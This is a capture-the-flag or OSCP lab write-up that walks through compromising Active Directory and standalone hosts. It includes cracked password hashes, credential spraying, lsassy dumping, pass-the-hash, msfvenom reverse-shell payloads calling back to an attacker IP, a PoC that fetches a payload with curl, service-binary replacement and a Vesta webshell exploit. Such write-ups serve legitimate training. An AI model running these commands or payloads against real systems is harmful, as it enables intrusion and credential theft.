Information
About this lab
This lab guides learners through an Active Directory exploitation chain, beginning with credential discovery in a SQLite database on an exposed web server. By cracking the credentials, learners gain access to an internal system via WinRM, escalate privileges through binary analysis and pivoting, and extract the domain administrator hash to achieve full domain compromise.
Active Directory Set
192.168.135.153 - MS01
Eric.Wallows / EricLikesRunning800Nmap
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8000/tcp open http-altInformation Gathering
feroxbuster로 웹 스캔 Performed directory scan via feroxbuster and found the following exposed endpoints:
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ feroxbuster -u http://192.168.135.153:8000 -s 200 -t 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.135.153:8000/
🚩 In-Scope Url │ 192.168.135.153
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 359l 2112w 178556c http://192.168.135.153:8000/iisstart.png
200 GET 32l 54w 696c http://192.168.135.153:8000/
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/db
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/DB
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/db
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/CHANGELOG
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/DB
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/CHANGELOG
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/changelog
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/changelog
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/DbDownloaded DB file
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ wget http://192.168.135.153:8000/partner/db
--2025-12-26 01:52:36-- http://192.168.135.153:8000/partner/db
Connecting to 192.168.135.153:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octet-stream]
Saving to: ‘db’
db 100%[=====================================================>] 16.00K --.-KB/s in 0.08s
2025-12-26 01:52:36 (194 KB/s) - ‘db’ saved [16384/16384]Found account credentials from DB file
- ecorp,7007296521223107d3445ea0db5a04f9
- support,26231162520c611ccabfb18b5ae4dff2
- bcorp,e7966b31d1cad8a83f12ecec236c384c
- acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ cat db.json
id,name,password,desc
1,ecorp,7007296521223107d3445ea0db5a04f9,-
2,support,26231162520c611ccabfb18b5ae4dff2,support account for internal use
3,bcorp,e7966b31d1cad8a83f12ecec236c384c,-
4,acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e,-Initial Access
Accessed to Windows system via SSH using the provided credentials
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh Eric.Wallows@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Eric.Wallows@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
oscp\eric.wallows@MS01 C:\Users\eric.wallows>Enumerated local user
*Evil-WinRM* PS C:\> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.Privilege Escalation
Discovered admintool.exe
oscp\eric.wallows@MS01 C:\Users\eric.wallows>dir
Volume in drive C has no label.
Volume Serial Number is 3C99-887F
Directory of C:\Users\eric.wallows
02/03/2025 01:14 PM <DIR> .
02/03/2025 01:14 PM <DIR> ..
11/21/2022 04:49 AM 6,102,702 admintool.exe
12/07/2019 01:14 AM <DIR> Desktop
12/25/2025 10:23 PM <DIR> Documents
12/07/2019 01:14 AM <DIR> Downloads
12/07/2019 01:14 AM <DIR> Favorites
12/07/2019 01:14 AM <DIR> Links
12/07/2019 01:14 AM <DIR> Music
12/07/2019 01:14 AM <DIR> Pictures
12/07/2019 01:14 AM <DIR> Saved Games
12/07/2019 01:14 AM <DIR> Videos
1 File(s) 6,102,702 bytes
11 Dir(s) 10,279,878,656 bytes freeExecuted admintool.exe and found administrator’s hash
- 05f8ba9f047f799adbea95a16de2ef5d
oscp\eric.wallows@MS01 C:\Users\eric.wallows>admintool.exe whoami
Enter administrator password:
thread 'main' panicked at 'assertion failed: `(left == right)`
left: `"d41d8cd98f00b204e9800998ecf8427e"`,
right: `"05f8ba9f047f799adbea95a16de2ef5d"`: Wrong administrator password!', src/main.rs:78:5
note: run with `RUST_BACKTRACE=1` environment variable to display a backtraceCracked hash
- https://hashes.com/en/decrypt/hash
- December31
- Freedom1
- ecorp
- Raid123!
- bcorp123!
05f8ba9f047f799adbea95a16de2ef5d:December31
26231162520c611ccabfb18b5ae4dff2:Freedom1
7007296521223107d3445ea0db5a04f9:ecorp
df5fb539ff32f7fde5f3c05d8c8c1a6e:Raid123!
e7966b31d1cad8a83f12ecec236c384c:bcorp123!
Successfully authenticated as administrator via SSH using previously cracked password
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh administrator@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
administrator@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
administrator@MS01 C:\Users\Administrator>Post-Exploitation
Checked powershell history and found the information that appeared to be password
- hghgib6vHT3bVWf
PS C:\Users\Administrator\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
<SNIP>Pivoting
Executed Ligolo-ng on kali linux for pivoting
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] daemon configuration file not found. Creating a new one...
? Enable Ligolo-ng WebUI? No
WARN[0001] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0001] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0001] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0058] Agent joined. id=005056ab5af9 name="MS01\\Administrator@MS01" remote="192.168.135.153:52168"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - MS01\Administrator@MS01 - 192.168.135.153:52168 - 005056ab5af9
[Agent : MS01\Administrator@MS01] » interface_create --name ligolo
INFO[0081] Creating a new ligolo interface...
INFO[0081] Interface created!
[Agent : MS01\Administrator@MS01] » start
INFO[0084] Starting tunnel to MS01\Administrator@MS01 (005056ab5af9)
[Agent : MS01\Administrator@MS01] » route_add --name ligolo --route 10.10.68.0/24
INFO[0101] Route created. Executed Ligolo-ng agent on ms01 machine
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\agent.exe -connect 192.168.`111111`:11601 -ignore-cert
agent.exe : time="2025-12-25T23:38:58-08:00" level=warning msg="warning, certificate validation disabled"
+ CategoryInfo : NotSpecified: (time="2025-12-2...ation disabled":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
time="2025-12-25T23:38:59-08:00" level=info msg="Connection established" addr="192.168.45.199:11601"10.10.68.154 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsmanLateral Movement (MS01 to MS02)
Performed password spraying attack against WinRM service using nxc and successfully authenticated as administrator with the following credentials:
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad]
└─$ nxc winrm 10.10.68.154 -u users.txt -p password.txt -t 100 --continue-on-success --local-auth
WINRM 10.10.68.154 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.68.154 5985 MS02 [-] MS02\administrator:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:EricLikesRunning800
<SNIP>
WINRM 10.10.68.154 5985 MS02 [-] MS02\bcorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [-] MS02\acorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:hghgib6vHT3bVWf
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:hghgib6vHT3bVWfAccessed to 10.10.68.154 via WinRM
┌──(kali🎃kali)-[~/oscp/ad]
└─$ evil-winrm -i 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Post-Exploitation
Dumped credentials using nxc’s lassy module and successfully extracted administrator NTLM hash
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad/154]
└─$ nxc smb 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf' --local-auth -M lsassy
SMB 10.10.68.154 445 MS02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS02) (domain:MS02) (signing:False) (SMBv1:False)
SMB 10.10.68.154 445 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
LSASSY 10.10.68.154 445 MS02 OSCP\Administrator 59b280ba707d22e3ef0aa587fc29ffe510.10.68.152 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanLateral Movement (MS02 to DC01)
Authenticated via WinRM using previously obtained administrator NTLM hash from ms02
┌──(kali🎃kali)-[~]
└─$ nxc winrm 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
WINRM 10.10.68.152 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.68.152 5985 DC01 [+] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 (Pwn3d!)
WINRM 10.10.68.152 5985 DC01 [-] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 zip() argumenAccessed via WinRM
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
1cfa2fd5d9f96abf7da31c2a724927a4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.68.152
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.68.254Independent Challenge
192.168.135.155 - Pascha
Nmap
PORT STATE SERVICE
80/tcp open http
9099/tcp open unknown
9999/tcp open abyssInitial Access
Searched “9099/tcp open unknown vuln” and identified it as Mobile Mouse 3.6.0.4 which has a RCE vulnerability
Downloaded POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit -m 51010
Exploit: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51010
Path: /usr/share/exploitdb/exploits/windows/remote/51010.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/155/51010.pyCreated a reverse shell executable
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9099 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: met.exeOpened http server on port 8080 to host the malicious payload (met.exe)
┌──(kali🎃kali)-[~/oscp/155]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...Set up nc reverse shell listener on port 9099
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...Executed POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ python 51010.py --target 192.168.135.155 --file met.exe --lhost 192.168.45.199
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\{'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\W'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\{'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\W'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
Executing The Command Shell...
Take The RoseSuccessfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 53346
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>Read local.txt
PS C:\Users\tim\Desktop> type local.txt
type local.txt
7bcaf20a94dc192a17c0ea06bdd45366
PS C:\Users\tim\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fdb5:ada4:541a:7a21
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254Privilege Escalation
powerup Executed powerup enumeration and discovered that the service executable (C:\Program Files\MilleGPG5\GPGService.exe) is modifiable
ServiceName : GPGOrchestrator
Path : "C:\Program Files\MilleGPG5\GPGService.exe"
ModifiableFile : C:\Program Files\MilleGPG5\GPGService.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'GPGOrchestrator'
CanRestart : True
Name : GPGOrchestrator
Check : Modifiable Service FilesCreated a reverse shell payload to connect back on port 9999
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9999 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exeStopped GPGOrchestrator service and replaced GPGService.exe with payload.exe
PS C:\Users\Tim\Desktop> sc.exe stop GPGOrchestrator
sc.exe stop GPGOrchestrator
SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\Tim\Desktop> cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"
cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"Started GPGOrchestrator service
PS C:\Users\Tim\Desktop> sc.exe start GPGOrchestrator
sc.exe start GPGOrchestrator
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Successfully established nc connection on port 9999
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 55262
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read proof.txt
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2025 6:59 AM 34 proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
f467f9374a3d455ce6a49eb39ac0328a
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2349:460f:c907:a12c%4
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254192.168.135.156 - Frankfurt
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2525/tcp open ms-v-worlds
3306/tcp open mysql
8080/tcp open http-proxy
8083/tcp open us-srv
8443/tcp open https-alt
53/udp open domain
161/udp open snmpInitial Access & Privilege Escalation
Checked SNMP community string and identified that the “public” string is used
┌──(kali🎃kali)-[~/oscp/156]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.135.156
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 10:54:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.135.156:161/
[161][snmp] host: 192.168.135.156 password: public
[STATUS] attack finished for 192.168.135.156 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 10:54:28Performed snmpwalk and discovered recently reset credentials for user “jack”:
- jack:3PUKsX98BMupBiCf
┌──(kali🎃kali)-[~/oscp/156]
└─$ snmpwalk -v2c -c public 192.168.135.156 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password-cmd" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password-cmd" = STRING: "\"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password-cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password-cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password-cmd" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password-cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password-cmd" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password-cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password-cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password" = INTEGER: 256
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password-cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password".1 = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password-cmd".1 = STRING: "jack:3PUKsX98BMupBiCf" | chpasswdAccessed web service on port 8083 and found Vesta service’s login page
Logged in with jack:3PUKsX98BMupBiCf
Found RCE vulnerablity in Vesta
Executed POC using the previously authenticated jack credentials and obatained root previlege shell
┌──(kali🎃kali)-[~/oscp/156/vesta-rce-exploit]
└─$ python vesta-rce-exploit.py https://192.168.135.156:8083 jack 3PUKsX98BMupBiCf
[INFO] Attempting login to https://192.168.135.156:8083 as jack
[+] Logged in as jack
[INFO] Checking for existing webshell or creating one
[!] xzy0qvzq2m.poc not found, creating one...
[+] xzy0qvzq2m.poc added
[+] xzy0qvzq2m.poc found, looking up webshell
[!] webshell not found, creating one..
[+] Webshell uploaded
[INFO] Creating mailbox on domain xzy0qvzq2m.poc
[!] Mail domain not found, creating one..
[+] Mail domain created
[+] Mail account created
[INFO] Editing mailbox to test payload
[INFO] Deploying backdoor via mailbox editing
[INFO] [+] Root shell possibly obtained. Enter commands:
# id
uid=0(root) gid=0(root) groups=0(root)Read local.txt
# cat /home/jack/local.txt
9cfca959e54738e70905a4024d16a44a
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94989 bytes 6111879 (6.1 MB)
RX errors 0 dropped 757 overruns 0 frame 0
TX packets 84189 bytes 7450035 (7.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8205 bytes 847767 (847.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8205 bytes 847767 (847.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Read proof.txt
# cat /root/proof.txt
07fd2596d9afbb88f7864b5dd02244ea
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94102 bytes 6021197 (6.0 MB)
RX errors 0 dropped 755 overruns 0 frame 0
TX packets 83675 bytes 6854793 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7483 bytes 765378 (765.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7483 bytes 765378 (765.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0192.168.135.157 - Charlie
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
20000/tcp open dnpInitial Access
Anonymous FTP login successful
┌──(kali🎃kali)-[~/oscp/157]
└─$ ftp 192.168.135.157
Connected to 192.168.135.157.
220 (vsFTPd 3.0.5)
Name (192.168.135.157:kali): anonymous
331 Please specify the password.
Password:
230 Login successfulFound pdf files in backup directory
ftp> ls
229 Entering Extended Passive Mode (|||10097|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 120 4096 Nov 02 2022 backup
226 Directory send OK.
ftp> cd backup
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10099|)
150 Here comes the directory listing.
-rw-r--r-- 1 114 120 145831 Nov 02 2022 BROCHURE-TEMPLATE.pdf
-rw-r--r-- 1 114 120 159765 Nov 02 2022 CALENDAR-TEMPLATE.pdf
-rw-r--r-- 1 114 120 336971 Nov 02 2022 FUNCTION-TEMPLATE.pdf
-rw-r--r-- 1 114 120 739052 Nov 02 2022 NEWSLETTER-TEMPLATE.pdf
-rw-r--r-- 1 114 120 888653 Nov 02 2022 REPORT-TEMPLATE.pdfDownloaded pdf files
ftp> mget *
mget BROCHURE-TEMPLATE.pdf [anpqy?]? a
Prompting off for duration of mget.
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for BROCHURE-TEMPLATE.pdf (145831 bytes).
100% |***************************************************************************| 142 KiB 319.42 KiB/s 00:00 ETA
226 Transfer complete.
145831 bytes received in 00:00 (241.87 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for CALENDAR-TEMPLATE.pdf (159765 bytes).
100% |***************************************************************************| 156 KiB 338.52 KiB/s 00:00 ETA
226 Transfer complete.
159765 bytes received in 00:00 (254.41 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for FUNCTION-TEMPLATE.pdf (336971 bytes).
100% |***************************************************************************| 329 KiB 396.25 KiB/s 00:00 ETA
226 Transfer complete.
336971 bytes received in 00:00 (341.38 KiB/s)
229 Entering Extended Passive Mode (|||10094|)
150 Opening BINARY mode data connection for NEWSLETTER-TEMPLATE.pdf (739052 bytes).
100% |***************************************************************************| 721 KiB 535.89 KiB/s 00:00 ETA
226 Transfer complete.
739052 bytes received in 00:01 (487.95 KiB/s)
229 Entering Extended Passive Mode (|||10098|)
150 Opening BINARY mode data connection for REPORT-TEMPLATE.pdf (888653 bytes).
100% |***************************************************************************| 867 KiB 722.38 KiB/s 00:00 ETA
226 Transfer complete.
888653 bytes received in 00:01 (648.10 KiB/s)Checked pdf file creator
- Cassie
- Mark
- Robert
┌──(kali🎃kali)-[~/oscp/157]
└─$ exiftool *.pdf | grep Author
Author : Cassie
Author : Mark
Author : RobertPerformed FTP brute-force attack and discovered valid credentials:
- cassie / cassie
┌──(kali🎃kali)-[~/oscp/157]
└─$ hydra -L users.txt -P users.txt ftp://192.168.135.157 -t 50
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 11:54:55
[DATA] max 36 tasks per 1 server, overall 36 tasks, 36 login tries (l:6/p:6), ~1 try per task
[DATA] attacking ftp://192.168.135.157:21/
[21][ftp] host: 192.168.135.157 login: cassie password: cassie
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 11:55:00Access web service on port 20000 and idendtified Usermin service is running
Successfully logged in with cassie:cassie
Found Usermin Authenticated RCE vulnerablity
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit Usermin
